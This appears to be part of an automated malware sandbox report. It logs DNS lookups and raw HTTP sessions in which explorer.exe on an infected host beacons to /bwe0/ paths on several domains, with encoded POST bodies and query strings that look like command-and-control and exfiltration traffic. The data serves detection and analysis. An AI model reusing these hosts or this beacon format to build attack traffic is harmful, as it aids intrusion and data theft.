Aug 11, 2022 06:29:53.592797995 CEST	8.8.8.8	192.168.2.3	0xd218	No error (0)	kinemartigues.com		51.159.175.169	A (IP address)	IN (0x0001)
Aug 11, 2022 06:30:00.802969933 CEST	8.8.8.8	192.168.2.3	0x4560	No error (0)	www.epic45.co.uk		103.67.235.120	A (IP address)	IN (0x0001)
Aug 11, 2022 06:30:08.931277990 CEST	8.8.8.8	192.168.2.3	0x6161	No error (0)	www.mogdento.com	mogdento.com		CNAME (Canonical name)	IN (0x0001)
Aug 11, 2022 06:30:08.931277990 CEST	8.8.8.8	192.168.2.3	0x6161	No error (0)	mogdento.com		103.92.235.55	A (IP address)	IN (0x0001)
Aug 11, 2022 06:30:17.702488899 CEST	8.8.8.8	192.168.2.3	0x6147	No error (0)	www.posinet1.com		202.172.26.50	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.blackyaga.xyz

www.expectedclosure.one

www.kinemartigues.com

www.epic45.co.uk

www.mogdento.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49789	85.159.66.93	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:29:41.052706957 CEST	1720	OUT	GET /bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=sE+e17jc53oiMc/tXTBrdM81Jmo39pRVgGsWsNeg2yHBZP8DMvAafxUSa5mU59eBVMhEqwjNcWZP/MmjQeTg8VWUgAq2ah5qoA== HTTP/1.1 Host: www.blackyaga.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 11, 2022 06:29:41.104178905 CEST	1720	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Thu, 11 Aug 2022 04:29:41 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 9 X-Rate-Limit-Reset: 2022-08-11T04:29:46.0784500Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49795	192.3.130.2	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:29:46.268229961 CEST	10116	OUT	POST /bwe0/ HTTP/1.1 Host: www.expectedclosure.one Connection: close Content-Length: 412 Cache-Control: no-cache Origin: http://www.expectedclosure.one User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.expectedclosure.one/bwe0/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 39 72 56 38 7a 6c 3d 7e 32 79 62 59 68 7a 7a 38 51 68 46 58 58 28 4a 67 53 55 6c 6f 2d 48 71 71 46 7a 32 35 55 73 73 50 4a 64 6e 6e 78 4e 52 75 45 56 76 44 41 36 6b 34 49 41 4c 69 64 64 7a 56 52 38 2d 71 61 6e 6a 7a 56 6a 6b 45 76 48 4f 4f 33 6e 49 77 43 79 55 49 42 75 61 44 77 50 31 32 7a 6e 6b 36 69 36 48 34 61 32 52 46 74 70 30 57 46 4f 6a 66 66 79 38 4e 53 70 53 77 79 64 5a 78 55 45 34 31 57 42 39 66 32 47 33 42 79 62 33 7a 6d 34 42 33 63 52 46 44 43 6b 48 6c 38 4d 34 6e 4e 4b 53 39 78 66 6a 30 62 37 4b 4c 50 55 75 75 4a 30 57 41 4e 30 61 6c 6d 38 57 52 63 34 63 77 46 6d 5f 4e 4b 44 32 71 70 59 38 49 37 78 39 28 46 57 30 36 66 63 68 74 42 71 6c 7e 33 49 38 75 6c 52 41 63 31 36 4d 45 6c 76 75 66 4a 68 31 5a 49 62 55 6a 33 6c 36 41 2d 33 6f 33 6c 4b 43 78 41 41 58 33 57 32 33 34 74 48 6a 42 4f 28 5a 7a 38 5a 76 78 4d 51 6f 37 6a 64 59 58 2d 46 6b 54 6e 39 62 69 6f 4b 74 55 68 78 4e 45 55 31 73 66 79 33 5f 52 4d 68 4a 64 51 74 49 59 67 76 52 6c 37 54 37 67 62 69 6e 54 74 7e 38 54 2d 57 62 51 36 74 77 42 48 77 66 71 45 53 50 7a 39 70 31 4a 58 46 4e 34 37 67 33 67 68 7e 4f 47 49 4a 4b 56 42 52 67 30 6b 68 59 33 50 79 37 7e 46 6d 76 66 7a 7a 58 30 57 6b 69 46 68 6e 6c 32 53 45 67 57 71 46 39 6e 46 70 70 39 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 9rV8zl=~2ybYhzz8QhFXX(JgSUlo-HqqFz25UssPJdnnxNRuEVvDA6k4IALiddzVR8-qanjzVjkEvHOO3nIwCyUIBuaDwP12znk6i6H4a2RFtp0WFOjffy8NSpSwydZxUE41WB9f2G3Byb3zm4B3cRFDCkHl8M4nNKS9xfj0b7KLPUuuJ0WAN0alm8WRc4cwFm_NKD2qpY8I7x9(FW06fchtBql~3I8ulRAc16MElvufJh1ZIbUj3l6A-3o3lKCxAAX3W234tHjBO(Zz8ZvxMQo7jdYX-FkTn9bioKtUhxNEU1sfy3_RMhJdQtIYgvRl7T7gbinTt~8T-WbQ6twBHwfqESPz9p1JXFN47g3gh~OGIJKVBRg0khY3Py7~FmvfzzX0WkiFhnl2SEgWqF9nFpp9g).
Aug 11, 2022 06:29:46.389247894 CEST	10116	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.20.1 Date: Thu, 11 Aug 2022 04:29:46 GMT Content-Type: text/html Content-Length: 169 Connection: close Location: https://www.expectedclosure.one/bwe0/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.20.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49798	192.3.130.2	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:29:48.410831928 CEST	10122	OUT	GET /bwe0/?9rV8zl=z0a7bU3Grk9SZV+rn0o4us/noU2vzWsLY51yg1R10n5VTVON6q0J/IdVbRNrmdil3H/zWNK1GQbVnCycFh7AKivH+ief+xiP+g==&YN9=w6PTp6pp-Zfte2a0 HTTP/1.1 Host: www.expectedclosure.one Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 11, 2022 06:29:48.527945042 CEST	10123	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.20.1 Date: Thu, 11 Aug 2022 04:29:48 GMT Content-Type: text/html Content-Length: 169 Connection: close Location: https://www.expectedclosure.one/bwe0/?9rV8zl=z0a7bU3Grk9SZV+rn0o4us/noU2vzWsLY51yg1R10n5VTVON6q0J/IdVbRNrmdil3H/zWNK1GQbVnCycFh7AKivH+ief+xiP+g==&YN9=w6PTp6pp-Zfte2a0 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.20.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49819	51.159.175.169	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:29:53.627378941 CEST	11852	OUT	POST /bwe0/ HTTP/1.1 Host: www.kinemartigues.com Connection: close Content-Length: 412 Cache-Control: no-cache Origin: http://www.kinemartigues.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.kinemartigues.com/bwe0/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 39 72 56 38 7a 6c 3d 42 35 56 53 6a 37 71 39 4f 72 72 58 74 30 51 79 4f 33 7e 74 35 48 47 34 67 51 31 49 59 47 6a 41 6b 72 34 67 72 63 6c 73 51 54 5a 79 67 4a 6d 79 43 5a 56 7a 4f 61 65 35 6d 38 72 2d 70 4f 67 62 72 55 73 35 73 78 63 45 71 6a 7a 63 62 49 6a 59 62 75 49 6d 6f 38 36 54 73 4a 73 4e 69 73 59 4d 4d 6a 4b 71 35 66 63 31 77 49 6d 69 59 46 41 31 64 32 6c 75 59 43 73 62 4b 49 57 31 32 2d 4d 51 46 43 6f 7a 64 79 6d 4a 69 37 6e 30 65 58 79 5f 37 5f 38 6a 28 6c 75 66 35 59 31 6d 66 4e 71 6c 56 61 78 45 37 35 63 6a 33 5a 66 61 6f 33 6e 4f 43 30 50 6b 31 57 54 43 28 33 4f 55 42 64 69 65 5a 4a 55 76 4b 6a 65 44 36 41 69 53 6e 43 59 6f 28 46 70 64 39 32 50 7a 6a 7a 51 54 43 64 43 56 63 32 38 74 51 58 67 56 37 52 34 42 71 2d 4b 37 64 4a 5a 76 39 48 6b 31 39 6a 65 35 51 75 34 50 7e 58 64 54 33 56 79 47 48 33 4c 5a 57 45 6c 76 45 65 77 67 44 33 67 6c 35 42 28 73 5a 34 31 47 71 34 7e 39 30 59 6c 33 5a 37 57 51 34 4f 55 67 6b 67 4d 57 67 45 4f 37 4d 48 72 6d 34 72 4d 74 33 38 57 78 53 31 57 56 49 5a 5a 32 38 6d 74 7a 67 45 4f 4d 35 62 5a 62 28 6e 64 61 7a 59 5a 4a 56 78 4c 39 5a 6a 59 4d 4d 41 48 58 47 4b 4b 35 30 6d 37 58 54 74 61 57 63 74 7a 4a 35 52 42 57 71 6c 74 7a 6d 59 62 62 72 43 6d 74 65 62 4a 55 6b 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 9rV8zl=B5VSj7q9OrrXt0QyO3~t5HG4gQ1IYGjAkr4grclsQTZygJmyCZVzOae5m8r-pOgbrUs5sxcEqjzcbIjYbuImo86TsJsNisYMMjKq5fc1wImiYFA1d2luYCsbKIW12-MQFCozdymJi7n0eXy_7_8j(luf5Y1mfNqlVaxE75cj3Zfao3nOC0Pk1WTC(3OUBdieZJUvKjeD6AiSnCYo(Fpd92PzjzQTCdCVc28tQXgV7R4Bq-K7dJZv9Hk19je5Qu4P~XdT3VyGH3LZWElvEewgD3gl5B(sZ41Gq4~90Yl3Z7WQ4OUgkgMWgEO7MHrm4rMt38WxS1WVIZZ28mtzgEOM5bZb(ndazYZJVxL9ZjYMMAHXGKK50m7XTtaWctzJ5RBWqltzmYbbrCmtebJUkA).
Aug 11, 2022 06:29:53.659858942 CEST	11852	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 11 Aug 2022 04:29:53 GMT Server: Apache Location: https://www.kinemartigues.com/bwe0/ Content-Length: 243 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 69 6e 65 6d 61 72 74 69 67 75 65 73 2e 63 6f 6d 2f 62 77 65 30 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.kinemartigues.com/bwe0/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49821	51.159.175.169	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:29:55.693173885 CEST	11856	OUT	GET /bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=M79ygOKZB+LrmWtJBQqMyCe4o1I9YkrzlNkt4Y5lQSVrtsHmDN4rDqK6jdbIqfImlF05yj9AnCTnfqfBJ/tqveG/rYA7nf00SA== HTTP/1.1 Host: www.kinemartigues.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 11, 2022 06:29:55.733656883 CEST	11857	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 11 Aug 2022 04:29:55 GMT Server: Apache Location: https://www.kinemartigues.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=M79ygOKZB+LrmWtJBQqMyCe4o1I9YkrzlNkt4Y5lQSVrtsHmDN4rDqK6jdbIqfImlF05yj9AnCTnfqfBJ/tqveG/rYA7nf00SA== Content-Length: 376 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 69 6e 65 6d 61 72 74 69 67 75 65 73 2e 63 6f 6d 2f 62 77 65 30 2f 3f 59 4e 39 3d 77 36 50 54 70 36 70 70 2d 5a 66 74 65 32 61 30 26 61 6d 70 3b 39 72 56 38 7a 6c 3d 4d 37 39 79 67 4f 4b 5a 42 2b 4c 72 6d 57 74 4a 42 51 71 4d 79 43 65 34 6f 31 49 39 59 6b 72 7a 6c 4e 6b 74 34 59 35 6c 51 53 56 72 74 73 48 6d 44 4e 34 72 44 71 4b 36 6a 64 62 49 71 66 49 6d 6c 46 30 35 79 6a 39 41 6e 43 54 6e 66 71 66 42 4a 2f 74 71 76 65 47 2f 72 59 41 37 6e 66 30 30 53 41 3d 3d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.kinemartigues.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=M79ygOKZB+LrmWtJBQqMyCe4o1I9YkrzlNkt4Y5lQSVrtsHmDN4rDqK6jdbIqfImlF05yj9AnCTnfqfBJ/tqveG/rYA7nf00SA==">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49822	103.67.235.120	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:30:01.027570009 CEST	11858	OUT	POST /bwe0/ HTTP/1.1 Host: www.epic45.co.uk Connection: close Content-Length: 412 Cache-Control: no-cache Origin: http://www.epic45.co.uk User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.epic45.co.uk/bwe0/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 39 72 56 38 7a 6c 3d 37 33 46 44 59 52 4b 62 51 55 65 6b 6e 4e 72 35 6d 35 77 70 70 4a 66 6a 4c 6a 65 54 6b 43 74 32 64 71 71 4c 43 68 42 78 62 34 65 36 59 73 33 4f 32 5f 28 78 59 74 54 62 4d 4b 4f 35 7a 42 4d 4b 54 49 63 4d 35 6f 54 4e 39 58 42 31 36 72 58 36 57 7a 41 37 72 66 6b 73 4e 4a 70 74 34 59 78 54 55 6e 39 59 71 34 39 46 4f 42 49 48 46 48 59 74 57 47 62 38 69 5a 4b 46 7e 4e 63 39 41 36 42 6c 39 68 4e 43 76 6d 73 57 75 75 77 50 4e 5a 7e 32 7e 33 39 74 69 42 75 4f 56 36 45 7a 79 69 54 57 59 48 42 4f 42 49 74 6d 6a 5a 4e 68 31 42 47 50 35 49 69 78 6f 65 76 65 63 52 45 53 6e 66 50 43 78 50 5a 4a 72 75 77 78 30 72 6d 68 74 6a 34 75 5a 41 50 46 71 5f 59 6a 61 4b 4b 36 53 71 7e 68 55 46 6e 44 67 37 54 38 41 36 52 2d 77 33 4c 54 57 41 30 52 4b 5a 77 30 31 69 33 4d 72 45 32 35 38 63 46 6d 74 4d 39 5a 35 54 7a 31 41 69 38 4e 45 32 6d 67 36 64 37 65 41 59 46 5f 30 6f 77 64 77 6c 45 51 56 44 51 65 51 4a 78 50 59 2d 61 4e 72 52 36 57 67 62 30 4f 4b 34 37 63 41 72 34 5a 4b 6b 6c 75 6f 63 36 75 36 46 4d 61 62 5a 42 32 74 63 70 49 6f 7a 73 63 75 72 32 43 75 34 46 44 73 77 77 5f 4c 69 48 41 32 66 6e 2d 59 53 7e 64 58 37 32 42 74 37 4d 61 57 67 31 57 67 6d 42 78 77 38 63 31 28 76 66 70 38 4e 69 7a 79 50 53 4a 67 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 9rV8zl=73FDYRKbQUeknNr5m5wppJfjLjeTkCt2dqqLChBxb4e6Ys3O2_(xYtTbMKO5zBMKTIcM5oTN9XB16rX6WzA7rfksNJpt4YxTUn9Yq49FOBIHFHYtWGb8iZKF~Nc9A6Bl9hNCvmsWuuwPNZ~2~39tiBuOV6EzyiTWYHBOBItmjZNh1BGP5IixoevecRESnfPCxPZJruwx0rmhtj4uZAPFq_YjaKK6Sq~hUFnDg7T8A6R-w3LTWA0RKZw01i3MrE258cFmtM9Z5Tz1Ai8NE2mg6d7eAYF_0owdwlEQVDQeQJxPY-aNrR6Wgb0OK47cAr4ZKkluoc6u6FMabZB2tcpIozscur2Cu4FDsww_LiHA2fn-YS~dX72Bt7MaWg1WgmBxw8c1(vfp8NizyPSJgQ).
Aug 11, 2022 06:30:01.248380899 CEST	11859	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 11 Aug 2022 04:30:01 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 393 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 65 70 69 63 34 35 2e 63 6f 2e 75 6b 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at epic45.co.uk Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49823	103.67.235.120	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:30:03.300090075 CEST	11859	OUT	GET /bwe0/?9rV8zl=21tjbkChbFWznsu0s5dQgMCLDQHTp3tJL/2kMDFZYsfdSZfl+tTwQu/FIpmHzzlEQrwumqO36HFfwo3EfD1Crt0mHKlMwrNEfw==&YN9=w6PTp6pp-Zfte2a0 HTTP/1.1 Host: www.epic45.co.uk Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 11, 2022 06:30:03.520287991 CEST	11860	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 11 Aug 2022 04:30:03 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 393 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 65 70 69 63 34 35 2e 63 6f 2e 75 6b 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at epic45.co.uk Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.3	49825	103.92.235.55	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:30:09.121141911 CEST	11870	OUT	POST /bwe0/ HTTP/1.1 Host: www.mogdento.com Connection: close Content-Length: 412 Cache-Control: no-cache Origin: http://www.mogdento.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.mogdento.com/bwe0/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 39 72 56 38 7a 6c 3d 54 48 56 65 71 57 49 4c 62 30 44 33 79 56 36 4d 38 64 75 30 4f 69 77 5f 64 46 49 30 49 61 53 46 4c 6e 77 7a 28 37 6f 72 6e 33 48 6a 64 75 7a 78 79 7a 47 48 61 41 50 6b 37 77 57 49 47 67 71 37 5a 63 6e 77 56 53 39 2d 71 76 63 72 4f 30 6a 70 67 63 61 54 79 38 56 78 56 37 54 46 72 54 4a 33 35 46 48 49 45 79 68 6f 76 33 65 70 64 76 42 4d 66 39 34 41 79 6a 47 2d 49 52 6f 34 6f 64 59 4f 4b 6f 37 58 74 64 5a 36 6f 74 47 71 30 7a 48 6f 49 74 62 39 6d 78 78 74 4d 51 56 2d 7e 64 75 43 63 78 63 2d 38 36 7a 31 38 4f 53 77 31 4a 6b 6a 4e 32 4b 6b 76 4b 43 76 50 39 34 41 56 79 6a 78 56 38 67 6a 6a 32 30 45 4b 39 41 38 45 50 48 43 71 76 49 4c 62 4d 28 74 62 71 46 6b 42 33 7e 4f 30 49 6b 36 69 73 46 52 62 75 75 78 7e 51 28 62 50 6d 5a 78 78 6c 43 43 70 70 69 5f 7e 4f 4c 77 49 68 4d 67 30 33 28 6e 59 78 32 64 56 31 35 4e 37 66 46 48 77 67 65 4a 68 59 4a 53 28 2d 7e 54 76 35 4f 33 47 4c 46 30 75 51 30 4b 69 49 34 74 48 41 44 55 6f 67 66 33 38 68 6b 41 4c 5f 4d 70 6c 4d 38 53 46 6a 39 45 4a 48 66 4b 6e 38 54 6d 66 31 77 43 63 5f 42 32 5a 71 59 31 59 4a 52 73 33 76 57 58 73 58 5a 41 68 73 4c 62 4c 59 59 33 56 5f 64 36 31 71 56 34 41 66 7e 79 65 6d 57 78 50 69 4d 6e 50 61 43 39 46 61 57 69 57 6c 4b 55 65 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 9rV8zl=THVeqWILb0D3yV6M8du0Oiw_dFI0IaSFLnwz(7orn3HjduzxyzGHaAPk7wWIGgq7ZcnwVS9-qvcrO0jpgcaTy8VxV7TFrTJ35FHIEyhov3epdvBMf94AyjG-IRo4odYOKo7XtdZ6otGq0zHoItb9mxxtMQV-~duCcxc-86z18OSw1JkjN2KkvKCvP94AVyjxV8gjj20EK9A8EPHCqvILbM(tbqFkB3~O0Ik6isFRbuux~Q(bPmZxxlCCppi_~OLwIhMg03(nYx2dV15N7fFHwgeJhYJS(-~Tv5O3GLF0uQ0KiI4tHADUogf38hkAL_MplM8SFj9EJHfKn8Tmf1wCc_B2ZqY1YJRs3vWXsXZAhsLbLYY3V_d61qV4Af~yemWxPiMnPaC9FaWiWlKUew).
